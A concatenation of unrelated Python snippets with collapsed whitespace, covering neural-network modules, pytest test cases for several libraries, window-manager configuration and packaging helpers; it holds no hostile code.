def transposed_conv_model_without_bn(): x = torch.randn(10, 10, 4, 4, requires_grad=True) model = TransposedConvModelWithoutBN() torch.onnx.export(model, x, './model_transposed_conv_without_bn.onnx', export_params=True, opset_version=12, do_constant_folding=True, input_names=['input'], output_names=['output']) model = ONNXModel(load_model('./model_transposed_conv_without_bn.onnx')) return model
class FCAttention(nn.Module): def __init__(self, in_channels, norm_layer=nn.BatchNorm2d): super(FCAttention, self).__init__() self.avgpool = nn.AdaptiveAvgPool2d(1) self.fc = nn.Linear(in_channels, 1000) self.conv = nn.Sequential(nn.Conv2d(1000, in_channels, 1, bias=False), norm_layer(in_channels), nn.ReLU(True)) def forward(self, x): (n, c, _, _) = x.size() att = self.avgpool(x).view(n, c) att = self.fc(att).view(n, 1000, 1, 1) att = self.conv(att) return (x * att.expand_as(x))
class MessageFilter(BaseFilter): __slots__ = () def check_update(self, update: Update) -> Optional[Union[(bool, FilterDataDict)]]: if super().check_update(update): return self.filter(update.effective_message) return False def filter(self, message: Message) -> Optional[Union[(bool, FilterDataDict)]]:
.parametrize('distribution, lower, upper, init_guess, fixed_params, mass_below_lower', [(pm.Gamma, 0.1, 0.4, {'alpha': 1, 'beta': 10}, {}, None), (pm.Normal, 155, 180, {'mu': 170, 'sigma': 3}, {}, None), (pm.StudentT, 0.1, 0.4, {'mu': 10, 'sigma': 3}, {'nu': 7}, None), (pm.StudentT, 0, 1, {'mu': 5, 'sigma': 2, 'nu': 7}, {}, None), (pm.Exponential, 0, 1, {'lam': 1}, {}, 0), (pm.HalfNormal, 0, 1, {'sigma': 1}, {}, 0), (pm.Binomial, 0, 8, {'p': 0.5}, {'n': 10}, None), (pm.Poisson, 1, 15, {'mu': 10}, {}, None), (pm.Poisson, 19, 41, {'mu': 30}, {}, None)]) .parametrize('mass', [0.5, 0.75, 0.95]) def test_find_constrained_prior(distribution, lower, upper, init_guess, fixed_params, mass, mass_below_lower): opt_params = pm.find_constrained_prior(distribution, lower=lower, upper=upper, mass=mass, init_guess=init_guess, fixed_params=fixed_params, mass_below_lower=mass_below_lower) opt_distribution = distribution.dist(**opt_params) mass_in_interval = (pm.math.exp(pm.logcdf(opt_distribution, upper)) - pm.math.exp(pm.logcdf(opt_distribution, lower))).eval() assert (np.abs((mass_in_interval - mass)) <= 1e-05)
('pypyr.steps.filewrite.Path') def test_filewrite_append(mock_path): context = Context({'k1': 'v1', 'fileWrite': {'path': '/arb/blah', 'payload': 'one\ntwo\nthree', 'append': True}}) with io.StringIO() as out_text: with patch('pypyr.steps.filewrite.open', mock_open()) as mock_output: mock_output.return_value.write.side_effect = out_text.write filewrite.run_step(context) payload = out_text.getvalue() mock_path.assert_called_once_with('/arb/blah') mocked_path = mock_path.return_value mocked_path.parent.mkdir.assert_called_once_with(parents=True, exist_ok=True) mock_output.assert_called_once_with(mocked_path, 'a', encoding=None) assert (payload == 'one\ntwo\nthree')
def part_inst2inst_mask(gt_part): gt_part_seg = torch.zeros_like(gt_part[0]) for i in range(gt_part.shape[0]): gt_part_seg = torch.where((gt_part[i] != 0), gt_part[i], gt_part_seg) classes = gt_part.unique() ins_masks = [] ins_labels = [] for i in classes: ins_labels.append(i) ins_masks.append((gt_part_seg == i)) ins_labels = torch.stack(ins_labels) ins_masks = torch.stack(ins_masks) return (ins_labels.long(), ins_masks.float())
class BeginPairResponse(object): def __init__(self, ch_type: str, token: str) -> None: self.ch_type: str = ch_type self.token: str = token def __repr__(self) -> str: return f'{type(self).__name__}({self.__dict__})' def __eq__(self, other) -> bool: return ((self is other) or (self.__dict__ == other.__dict__))
.parametrize('superrep_conversion', [(lambda x: x), to_super, to_choi, to_chi, to_kraus]) def test_process_fidelity_of_identity(superrep_conversion): num_qubits = 3 oper = qeye((num_qubits * [2])) f = process_fidelity(superrep_conversion(oper)) assert np.isrealobj(f) assert (f == pytest.approx(1))
class PropagatePositions(): def __init__(self, node_builder, node_filter=None): self.node_builder = node_builder self.node_filter = node_filter def __call__(self, children): res = self.node_builder(children) if isinstance(res, Tree): res_meta = res.meta first_meta = self._pp_get_meta(children) if (first_meta is not None): if (not hasattr(res_meta, 'line')): res_meta.line = getattr(first_meta, 'container_line', first_meta.line) res_meta.column = getattr(first_meta, 'container_column', first_meta.column) res_meta.start_pos = getattr(first_meta, 'container_start_pos', first_meta.start_pos) res_meta.empty = False res_meta.container_line = getattr(first_meta, 'container_line', first_meta.line) res_meta.container_column = getattr(first_meta, 'container_column', first_meta.column) res_meta.container_start_pos = getattr(first_meta, 'container_start_pos', first_meta.start_pos) last_meta = self._pp_get_meta(reversed(children)) if (last_meta is not None): if (not hasattr(res_meta, 'end_line')): res_meta.end_line = getattr(last_meta, 'container_end_line', last_meta.end_line) res_meta.end_column = getattr(last_meta, 'container_end_column', last_meta.end_column) res_meta.end_pos = getattr(last_meta, 'container_end_pos', last_meta.end_pos) res_meta.empty = False res_meta.container_end_line = getattr(last_meta, 'container_end_line', last_meta.end_line) res_meta.container_end_column = getattr(last_meta, 'container_end_column', last_meta.end_column) res_meta.container_end_pos = getattr(last_meta, 'container_end_pos', last_meta.end_pos) return res def _pp_get_meta(self, children): for c in children: if ((self.node_filter is not None) and (not self.node_filter(c))): continue if isinstance(c, Tree): if (not c.meta.empty): return c.meta elif isinstance(c, Token): return c elif hasattr(c, '__lark_meta__'): return c.__lark_meta__()
class Effect3656(BaseEffect): type = 'passive' def handler(fit, module, context, projectionRange, **kwargs): fit.modules.filteredItemBoost((lambda mod: mod.item.requiresSkill('Gunnery')), 'trackingSpeed', module.getModifiedItemAttr('trackingSpeedBonus'), stackingPenalties=True, **kwargs)
def get_svn_scm_data(info): scm_data = 'Svn info:\n' scm_data += (((indent + 'URL: ') + info['url']) + '\n') scm_data += (((indent + 'Last Changed Rev: ') + info['lastchg']) + '\n') scm_data += (((indent + 'Last Changed Author: ') + info['author']) + '\n') scm_data += (((indent + 'Last Changed Date: ') + info['date']) + '\n') return scm_data
def demo_check_info(info: PackageInfo, requires_dist: (set[str] | None)=None) -> None: assert (info.name == 'demo') assert (info.version == '0.1.0') assert info.requires_dist if requires_dist: assert (set(info.requires_dist) == requires_dist) else: assert (set(info.requires_dist) in ({'cleo; extra == "foo"', 'pendulum (>=1.4.4)', 'tomlkit; extra == "bar"'}, {'cleo ; extra == "foo"', 'pendulum (>=1.4.4)', 'tomlkit ; extra == "bar"'}))
class Effect3703(BaseEffect): type = 'passive' def handler(fit, ship, context, projectionRange, **kwargs): groups = ('Missile Launcher Rapid Light', 'Missile Launcher Heavy', 'Missile Launcher Heavy Assault') fit.modules.filteredItemBoost((lambda mod: (mod.item.group.name in groups)), 'speed', ship.getModifiedItemAttr('shipBonusMC2'), skill='Minmatar Cruiser', **kwargs)
class ManagerConfig(Config): auto_fullscreen = True groups = [libqtile.config.Group('a'), libqtile.config.Group('b'), libqtile.config.Group('c'), libqtile.config.Group('d')] layouts = [libqtile.layout.stack.Stack(num_stacks=1), libqtile.layout.stack.Stack(num_stacks=2), libqtile.layout.tile.Tile(ratio=0.5), libqtile.layout.max.Max()] floating_layout = libqtile.layout.floating.Floating(float_rules=[*libqtile.layout.floating.Floating.default_float_rules, Match(wm_class='float'), Match(title='float')]) keys = [libqtile.config.Key(['control'], 'k', lazy.layout.up()), libqtile.config.Key(['control'], 'j', lazy.layout.down())] mouse = [] screens = [libqtile.config.Screen(bottom=libqtile.bar.Bar([libqtile.widget.Prompt(), libqtile.widget.GroupBox()], 20))] follow_mouse_focus = True reconfigure_screens = False
def test_literals(converter: BaseConverter) -> None: from typing import Literal union = Union[(int, str, None)] exact_type = Union[(int, Literal['test'], None)] configure_union_passthrough(union, converter) assert (converter.unstructure(1, exact_type) == 1) assert (converter.structure(1, exact_type) == 1) assert (converter.unstructure('test', exact_type) == 'test') assert (converter.structure('test', exact_type) == 'test') assert (converter.unstructure(None, exact_type) is None) assert (converter.structure(None, exact_type) is None) with pytest.raises(TypeError): converter.structure((), exact_type) with pytest.raises(TypeError): converter.structure('t', exact_type)
def measure_perplexity(predicted_indices, n_embed): encodings = F.one_hot(predicted_indices, n_embed).float().reshape((- 1), n_embed) avg_probs = encodings.mean(0) perplexity = (- (avg_probs * torch.log((avg_probs + 1e-10))).sum()).exp() cluster_use = torch.sum((avg_probs > 0)) return (perplexity, cluster_use)
class _ModelMixin(): ATOMIC = True def get_value(self, iter_, column=0, _base=Gtk.TreeModel.get_value): return _base(self, iter_, column) def get_n_columns(self): return 1 def iter_changed(self, iter_): self.row_changed(self.get_path(iter_), iter_) def path_changed(self, path): self.row_changed(path, self.get_iter(path)) def itervalues(self, iter_=None): iter_ = self.iter_children(iter_) getv = self.get_value inext = self.iter_next while iter_: (yield getv(iter_)) iter_ = inext(iter_) def values(self): return list(self.itervalues()) def iterrows(self, iter_=None): iter_ = self.iter_children(iter_) getv = self.get_value inext = self.iter_next while iter_: (yield (iter_, getv(iter_))) iter_ = inext(iter_) def is_empty(self): return (not self.get_iter_first()) _value = GObject.Value() _value.init(GObject.TYPE_PYOBJECT) def _get_marshalable(self, obj, _value=_value): if _gets_marshaled_to_pyobject(obj): return obj _value.set_boxed(obj) return _value del _value
class MinNode(object): def __init__(self, type=None, name=None): self.type = type self.name = name self.children = [] self.leaf = False self.parent = None self.alternatives = [] self.group = [] def __repr__(self): return ((str(self.type) + ' ') + str(self.name)) def leaf_to_root(self): node = self subp = [] while node: if (node.type == TYPE_ALTERNATIVES): node.alternatives.append(subp) if (len(node.alternatives) == len(node.children)): subp = [tuple(node.alternatives)] node.alternatives = [] node = node.parent continue else: node = node.parent subp = None break if (node.type == TYPE_GROUP): node.group.append(subp) if (len(node.group) == len(node.children)): subp = get_characteristic_subpattern(node.group) node.group = [] node = node.parent continue else: node = node.parent subp = None break if ((node.type == token_labels.NAME) and node.name): subp.append(node.name) else: subp.append(node.type) node = node.parent return subp def get_linear_subpattern(self): for l in self.leaves(): subp = l.leaf_to_root() if subp: return subp def leaves(self): for child in self.children: (yield from child.leaves()) if (not self.children): (yield self)
def test_ezkey(): key = config.EzKey('M-A-S-a', cmd, cmd) (modkey, altkey) = (config.EzConfig.modifier_keys[i] for i in 'MA') assert (key.modifiers == [modkey, altkey, 'shift']) assert (key.key == 'a') assert (key.commands == (cmd, cmd)) key = config.EzKey('M-<Tab>', cmd) assert (key.modifiers == [modkey]) assert (key.key == 'Tab') assert (key.commands == (cmd,)) with pytest.raises(utils.QtileError): config.EzKey('M--', cmd) with pytest.raises(utils.QtileError): config.EzKey('Z-Z-z', cmd) with pytest.raises(utils.QtileError): config.EzKey('asdf', cmd) with pytest.raises(utils.QtileError): config.EzKey('M-a-A', cmd)
class OggFLACStreamInfo(StreamInfo): length = 0 channels = 0 sample_rate = 0 def __init__(self, fileobj): page = OggPage(fileobj) while (not page.packets[0].startswith(b'\x7fFLAC')): page = OggPage(fileobj) (major, minor, self.packets, flac) = struct.unpack('>BBH4s', page.packets[0][5:13]) if (flac != b'fLaC'): raise OggFLACHeaderError(('invalid FLAC marker (%r)' % flac)) elif ((major, minor) != (1, 0)): raise OggFLACHeaderError(('unknown mapping version: %d.%d' % (major, minor))) self.serial = page.serial stringobj = BytesIO(page.packets[0][17:]) try: flac_info = FLACStreamInfo(stringobj) except FLACError as e: raise OggFLACHeaderError(e) for attr in ['min_blocksize', 'max_blocksize', 'sample_rate', 'channels', 'bits_per_sample', 'total_samples', 'length']: setattr(self, attr, getattr(flac_info, attr)) def _post_tags(self, fileobj): if self.length: return page = OggPage.find_last(fileobj, self.serial, finishing=True) if (page is None): raise OggFLACHeaderError self.length = (page.position / float(self.sample_rate)) def pprint(self): return (u'Ogg FLAC, %.2f seconds, %d Hz' % (self.length, self.sample_rate))
def get_eval_dataset(cfg, root_dataset_path, eval_dataset_name, eval_binary_path): eval_data_path = f'{root_dataset_path}/{eval_dataset_name}' assert PathManager.exists(eval_data_path), f'Unknown path: {eval_data_path}' num_samples = (20 if cfg.IMG_RETRIEVAL.DEBUG_MODE else None) if is_revisited_dataset(eval_dataset_name): eval_dataset = RevisitedInstanceRetrievalDataset(eval_dataset_name, root_dataset_path) elif is_instre_dataset(eval_dataset_name): eval_dataset = InstreDataset(eval_data_path, num_samples=num_samples) else: eval_dataset = InstanceRetrievalDataset(eval_data_path, eval_binary_path, num_samples=num_samples) return eval_dataset
def test_fileinrewriterstep_in_list_and_out_with_formatting(): context = Context({'k1': 'v1', 'root': {'in': ['inpath{k1}here', '2', '{k1}'], 'out': 'outpath{k1}here'}}) obj = FileInRewriterStep('blah.name', 'root', context) assert (obj.path_in == ['inpathv1here', '2', 'v1']) assert (obj.path_out == 'outpathv1here') assert (obj.context == context) assert (obj.logger.name == 'blah.name')
class FunctionContext(): def __init__(self, module_name: str, name: str, docstring: (str | None)=None, is_abstract: bool=False, class_info: (ClassInfo | None)=None) -> None: self.module_name = module_name self.name = name self.docstring = docstring self.is_abstract = is_abstract self.class_info = class_info self._fullname: (str | None) = None def fullname(self) -> str: if (self._fullname is None): if self.class_info: self._fullname = f'{self.module_name}.{self.class_info.name}.{self.name}' else: self._fullname = f'{self.module_name}.{self.name}' return self._fullname
def add_platforms(wheel_ctx: InWheelCtx, platforms: list[str], remove_platforms: Iterable[str]=()) -> str: definitely_not_purelib = False if (wheel_ctx.path is None): raise ValueError('This function should be called from wheel_ctx context manager') info_fname = pjoin(_dist_info_dir(wheel_ctx.path), 'WHEEL') info = read_pkg_info(info_fname) if (wheel_ctx.out_wheel is not None): out_dir = dirname(wheel_ctx.out_wheel) wheel_fname = basename(wheel_ctx.out_wheel) else: out_dir = '.' wheel_fname = basename(wheel_ctx.in_wheel) (_, _, _, in_tags) = parse_wheel_filename(wheel_fname) original_fname_tags = sorted({tag.platform for tag in in_tags}) logger.info('Previous filename tags: %s', ', '.join(original_fname_tags)) fname_tags = [tag for tag in original_fname_tags if (tag not in remove_platforms)] fname_tags = unique_by_index((fname_tags + platforms)) if (('any' in fname_tags) and (len(fname_tags) > 1)): fname_tags.remove('any') remove_platforms.append('any') definitely_not_purelib = True if (fname_tags != original_fname_tags): logger.info('New filename tags: %s', ', '.join(fname_tags)) else: logger.info('No filename tags change needed.') fparts = {'prefix': wheel_fname.rsplit('-', maxsplit=1)[0], 'plat': '.'.join(fname_tags), 'ext': splitext(wheel_fname)[1]} out_wheel_fname = '{prefix}-{plat}{ext}'.format(**fparts) out_wheel = pjoin(out_dir, out_wheel_fname) in_info_tags = [tag for (name, tag) in info.items() if (name == 'Tag')] logger.info('Previous WHEEL info tags: %s', ', '.join(in_info_tags)) pyc_apis = ['-'.join(tag.split('-')[:2]) for tag in in_info_tags] pyc_apis = unique_by_index(pyc_apis) wanted_tags = ['-'.join(tup) for tup in product(pyc_apis, platforms)] new_tags = [tag for tag in wanted_tags if (tag not in in_info_tags)] unwanted_tags = ['-'.join(tup) for tup in product(pyc_apis, remove_platforms)] updated_tags = [tag for tag in in_info_tags if (tag not in unwanted_tags)] updated_tags += new_tags if (updated_tags != in_info_tags): del info['Tag'] for tag in updated_tags: info.add_header('Tag', tag) if definitely_not_purelib: info['Root-Is-Purelib'] = 'False' logger.info('Changed wheel type to Platlib') logger.info('New WHEEL info tags: %s', ', '.join(info.get_all('Tag'))) write_pkg_info(info_fname, info) else: logger.info('No WHEEL info change needed.') return out_wheel
def test_convert_nifti_to_dicom(nifti_data, dicom_data): test_pat_id = 'LCTSC-Test-S1-101' ct_uid = '1.3.6.1.4.1.14519.5.2.1.7014.4598.' rtstruct_uid = '1.3.6.1.4.1.14519.5.2.1.7014.4598.' pat_path = dicom_data.joinpath(test_pat_id) ct_path = pat_path.joinpath(ct_uid) rtstruct_path = next(pat_path.joinpath(rtstruct_uid).glob('*.dcm')) masks = {} for mask_path in nifti_data.joinpath(test_pat_id).glob('STRUCTURES/*.nii.gz'): name = mask_path.name.split('.')[0].split('RTSTRUCT_')[1] masks[name] = str(mask_path) with tempfile.TemporaryDirectory() as temp_dir: output_file = Path(temp_dir).joinpath('test.dcm') convert_nifti(ct_path, masks, output_file) original = pydicom.read_file(rtstruct_path) rts = pydicom.read_file(output_file) assert (rts.Modality == original.Modality) assert (rts.PatientName == original.PatientName) assert (rts.PatientID == original.PatientID) contour_map = {} for i in original.StructureSetROISequence: for j in rts.StructureSetROISequence: if (j.ROIName.upper() == i.ROIName.upper()): contour_map[int(i.ROINumber)] = int(j.ROINumber) assert (len(contour_map.keys()) == 5) i = 1 for j in original.ROIContourSequence[(i - 1)].ContourSequence: for k in rts.ROIContourSequence[(contour_map[i] - 1)].ContourSequence: if (j.ContourData[2] == k.ContourData[2]): j_points = np.array(j.ContourData) j_points = j_points.reshape(j.NumberOfContourPoints, 3) k_points = np.array(k.ContourData) k_points = k_points.reshape(k.NumberOfContourPoints, 3) assert (max(abs((k_points.min(axis=0) - j_points.min(axis=0)))) < 0.83) assert (max(abs((k_points.max(axis=0) - j_points.max(axis=0)))) < 0.83)
def _type(string, has_invisible=True): if (has_invisible and (isinstance(string, _text_type) or isinstance(string, _binary_type))): string = _strip_invisible(string) if (string is None): return _none_type elif hasattr(string, 'isoformat'): return _text_type elif _isint(string): return int elif _isnumber(string): return float elif isinstance(string, _binary_type): return _binary_type else: return _text_type
.parametrize('new_pages', [[[0, (210, 298)], [2, (420, 595)], [None, (842, 1190)]]]) def test_new_page_on_existing_pdf(new_pages): pdf = pdfium.PdfDocument(TestResources.multipage) for (index, size) in new_pages: page = pdf.new_page(*size, index=index) if (index is None): index = (len(pdf) - 1) assert (page.get_size() == pdf.get_page_size(index) == size)
_arg_scope def bottleneck(inputs, depth, depth_bottleneck, stride, rate=1, outputs_collections=None, scope=None): with variable_scope.variable_scope(scope, 'bottleneck_v1', [inputs]) as sc: depth_in = utils.last_dimension(inputs.get_shape(), min_rank=4) if (depth == depth_in): shortcut = resnet_utils.subsample(inputs, stride, 'shortcut') else: shortcut = layers.conv2d(inputs, depth, [1, 1], stride=stride, activation_fn=None, scope='shortcut') residual = layers.conv2d(inputs, depth_bottleneck, [1, 1], stride=1, scope='conv1') residual = resnet_utils.conv2d_same(residual, depth_bottleneck, 3, stride, rate=rate, scope='conv2') residual = layers.conv2d(residual, depth, [1, 1], stride=1, activation_fn=None, scope='conv3') output = nn_ops.relu((shortcut + residual)) return utils.collect_named_outputs(outputs_collections, sc.name, output)
def test_dbe_element_add(): de = DualBasisElement() de_2 = DualBasisElement() db_0 = (de + de_2) assert isinstance(db_0, DualBasis) db_0 = (de_2 + de) assert isinstance(db_0, DualBasis) db_1 = (db_0 + db_0) assert isinstance(db_1, DualBasis) with pytest.raises(TypeError): _ = (de + 2)
class ClientPerMessageDeflateFactoryTests(unittest.TestCase, PerMessageDeflateTestsMixin): def test_name(self): assert (ClientPerMessageDeflateFactory.name == 'permessage-deflate') def test_init(self): for config in [(False, False, 8, None), (False, True, 15, None), (True, False, None, 8), (True, True, None, 15), (False, False, None, True), (False, False, None, None, {'memLevel': 4})]: with self.subTest(config=config): ClientPerMessageDeflateFactory(*config) def test_init_error(self): for config in [(False, False, 7, 8), (False, True, 8, 7), (True, False, 16, 15), (True, True, 15, 16), (False, False, True, None), (False, False, None, None, {'wbits': 11})]: with self.subTest(config=config): with self.assertRaises(ValueError): ClientPerMessageDeflateFactory(*config) def test_get_request_params(self): for (config, result) in [((False, False, None, None), []), ((True, False, None, None), [('server_no_context_takeover', None)]), ((False, True, None, None), [('client_no_context_takeover', None)]), ((False, False, 10, None), [('server_max_window_bits', '10')]), ((False, False, None, 10), [('client_max_window_bits', '10')]), ((False, False, None, True), [('client_max_window_bits', None)]), ((True, True, 12, 12), [('server_no_context_takeover', None), ('client_no_context_takeover', None), ('server_max_window_bits', '12'), ('client_max_window_bits', '12')])]: with self.subTest(config=config): factory = ClientPerMessageDeflateFactory(*config) self.assertEqual(factory.get_request_params(), result) def test_process_response_params(self): for (config, response_params, result) in [((False, False, None, None), [], (False, False, 15, 15)), ((False, False, None, None), [('unknown', None)], InvalidParameterName), ((False, False, None, None), [('server_no_context_takeover', None)], (True, False, 15, 15)), ((True, False, None, None), [], NegotiationError), ((True, False, None, None), [('server_no_context_takeover', None)], (True, False, 15, 15)), ((True, False, None, None), ([('server_no_context_takeover', None)] * 2), DuplicateParameter), ((True, False, None, None), [('server_no_context_takeover', '42')], InvalidParameterValue), ((False, False, None, None), [('client_no_context_takeover', None)], (False, True, 15, 15)), ((False, True, None, None), [], (False, True, 15, 15)), ((False, True, None, None), [('client_no_context_takeover', None)], (False, True, 15, 15)), ((False, True, None, None), ([('client_no_context_takeover', None)] * 2), DuplicateParameter), ((False, True, None, None), [('client_no_context_takeover', '42')], InvalidParameterValue), ((False, False, None, None), [('server_max_window_bits', '7')], NegotiationError), ((False, False, None, None), [('server_max_window_bits', '10')], (False, False, 10, 15)), ((False, False, None, None), [('server_max_window_bits', '16')], NegotiationError), ((False, False, 12, None), [], NegotiationError), ((False, False, 12, None), [('server_max_window_bits', '10')], (False, False, 10, 15)), ((False, False, 12, None), [('server_max_window_bits', '12')], (False, False, 12, 15)), ((False, False, 12, None), [('server_max_window_bits', '13')], NegotiationError), ((False, False, 12, None), ([('server_max_window_bits', '12')] * 2), DuplicateParameter), ((False, False, 12, None), [('server_max_window_bits', '42')], InvalidParameterValue), ((False, False, None, None), [('client_max_window_bits', '10')], NegotiationError), ((False, False, None, True), [], (False, False, 15, 15)), ((False, False, None, True), [('client_max_window_bits', '7')], NegotiationError), ((False, False, None, True), [('client_max_window_bits', '10')], (False, False, 15, 10)), ((False, False, None, True), [('client_max_window_bits', '16')], NegotiationError), ((False, False, None, 12), [], (False, False, 15, 12)), ((False, False, None, 12), [('client_max_window_bits', '10')], (False, False, 15, 10)), ((False, False, None, 12), [('client_max_window_bits', '12')], (False, False, 15, 12)), ((False, False, None, 12), [('client_max_window_bits', '13')], NegotiationError), ((False, False, None, 12), ([('client_max_window_bits', '12')] * 2), DuplicateParameter), ((False, False, None, 12), [('client_max_window_bits', '42')], InvalidParameterValue), ((True, True, 12, 12), [('server_no_context_takeover', None), ('client_no_context_takeover', None), ('server_max_window_bits', '10'), ('client_max_window_bits', '10')], (True, True, 10, 10)), ((False, False, None, True), [('server_no_context_takeover', None), ('client_no_context_takeover', None), ('server_max_window_bits', '10'), ('client_max_window_bits', '10')], (True, True, 10, 10)), ((True, True, 12, 12), [('server_no_context_takeover', None), ('server_max_window_bits', '12')], (True, True, 12, 12))]: with self.subTest(config=config, response_params=response_params): factory = ClientPerMessageDeflateFactory(*config) if (isinstance(result, type) and issubclass(result, Exception)): with self.assertRaises(result): factory.process_response_params(response_params, []) else: extension = factory.process_response_params(response_params, []) expected = PerMessageDeflate(*result) self.assertExtensionEqual(extension, expected) def test_process_response_params_deduplication(self): factory = ClientPerMessageDeflateFactory(False, False, None, None) with self.assertRaises(NegotiationError): factory.process_response_params([], [PerMessageDeflate(False, False, 15, 15)]) def test_enable_client_permessage_deflate(self): for (extensions, (expected_len, expected_position, expected_compress_settings)) in [(None, (1, 0, {'memLevel': 5})), ([], (1, 0, {'memLevel': 5})), ([ClientNoOpExtensionFactory()], (2, 1, {'memLevel': 5})), ([ClientPerMessageDeflateFactory(compress_settings={'memLevel': 7})], (1, 0, {'memLevel': 7})), ([ClientPerMessageDeflateFactory(compress_settings={'memLevel': 7}), ClientNoOpExtensionFactory()], (2, 0, {'memLevel': 7})), ([ClientNoOpExtensionFactory(), ClientPerMessageDeflateFactory(compress_settings={'memLevel': 7})], (2, 1, {'memLevel': 7}))]: with self.subTest(extensions=extensions): extensions = enable_client_permessage_deflate(extensions) self.assertEqual(len(extensions), expected_len) extension = extensions[expected_position] self.assertIsInstance(extension, ClientPerMessageDeflateFactory) self.assertEqual(extension.compress_settings, expected_compress_settings)
def get_config(): config = get_default_configs() training = config.training training.batch_size = 64 training.n_iters = 2400001 training.snapshot_sampling = True training.sde = 'vesde' training.continuous = True evaluate = config.eval evaluate.batch_size = 128 evaluate.num_samples = 50000 evaluate.ckpt_id = 26 sampling = config.sampling sampling.n_projections = 30 sampling.task = 'mri' sampling.snr = 0.517 sampling.coeff = 1.0 data = config.data data.dataset = 'brats' data.image_size = 240 data.num_channels = 1 data.centered = False data.random_flip = False data.uniform_dequantization = False model = config.model model.name = 'ncsnpp' model.scale_by_sigma = True model.sigma_max = 128.0 model.num_scales = 1000 model.ema_rate = 0.999 model.sigma_min = 0.01 model.beta_min = 0.1 model.beta_max = 20.0 model.normalization = 'GroupNorm' model.nonlinearity = 'swish' model.nf = 32 model.ch_mult = (1, 1, 2, 2, 2) model.num_res_blocks = 2 model.attn_resolutions = (30,) model.dropout = 0.0 model.resamp_with_conv = True model.conditional = True model.fir = True model.fir_kernel = [1, 3, 3, 1] model.skip_rescale = True model.resblock_type = 'biggan' model.progressive = 'output_skip' model.progressive_input = 'input_skip' model.progressive_combine = 'sum' model.attention_type = 'ddpm' model.init_scale = 0.0 model.fourier_scale = 16 model.conv_size = 3 optim = config.optim optim.weight_decay = 0 optim.optimizer = 'Adam' optim.lr = 0.0002 optim.beta1 = 0.9 optim.amsgrad = False optim.eps = 1e-08 optim.warmup = 5000 optim.grad_clip = 1.0 config.seed = 42 return config
class RequirementsBundleTestCase(TestCase): def test_has_file(self): reqs = RequirementsBundle() self.assertEqual(reqs.has_file_in_path('foo.txt'), False) self.assertEqual(reqs.has_file_in_path(''), False) reqs.append(RequirementFile(path='foo.txt', content='')) self.assertEqual(reqs.has_file_in_path('foo.txt'), True) def test_add(self): reqs = RequirementsBundle() self.assertEqual(reqs, []) reqs.append(RequirementFile(path='foo.txt', content='')) self.assertEqual(reqs[0].path, 'foo.txt') def test_get_initial_update_class(self): req = RequirementsBundle() klass = req.get_update_class(initial=True, scheduled=False, config=None) self.assertEqual(klass, req.get_initial_update_class()) def test_get_scheduled_update_class(self): req = RequirementsBundle() config = Mock() config.is_valid_schedule.return_value = True klass = req.get_update_class(initial=False, scheduled=True, config=config) self.assertEqual(klass, req.get_scheduled_update_class()) def test_get_sequential_update_class(self): req = RequirementsBundle() klass = req.get_update_class(initial=False, scheduled=False, config=None) self.assertEqual(klass, req.get_sequential_update_class()) def test_get_updates(self): with patch('pyup.requirements.Requirement.package', return_value=Mock()): reqs = RequirementsBundle() reqs.append(RequirementFile(path='r.txt', content='Bla')) updates = [u for u in reqs.get_updates(True, False, Mock())] self.assertEqual(len(updates), 1) reqs = RequirementsBundle() reqs.append(RequirementFile(path='r.txt', content='Bla')) updates = [u for u in reqs.get_updates(False, False, Mock())] self.assertEqual(len(updates), 1) def test_requirements(self): with patch('pyup.requirements.Requirement.package', return_value=Mock()): reqs = RequirementsBundle() reqs.append(RequirementFile(path='r.txt', content='Bla\nFoo')) self.assertEqual([Requirement.parse('Bla', 1), Requirement.parse('Foo', 2)], [r for r in reqs.requirements])
def jetpack_missing(repository, hardware, version): l4t = hardware['L4T'] title = 'jetson-stats not supported for [L4T {l4t}]'.format(l4t=l4t) template = 'jetpack-missing.md' body = 'Please update jetson-stats with new jetpack\n\n' body += '### Linux for Tegra\n\n' body += ((' - L4T: ' + l4t) + '\n\n') body += '### Jetson-Stats\n\n' body += ((' - Version: ' + version) + '\n') url = make_issue(repository, title, body=body, labels='Jetpack,missing', template=template) message = 'jetson-stats not supported for [L4T {l4t}]'.format(l4t=hardware['L4T']) hyperlink(message, url, 'open a Github issue')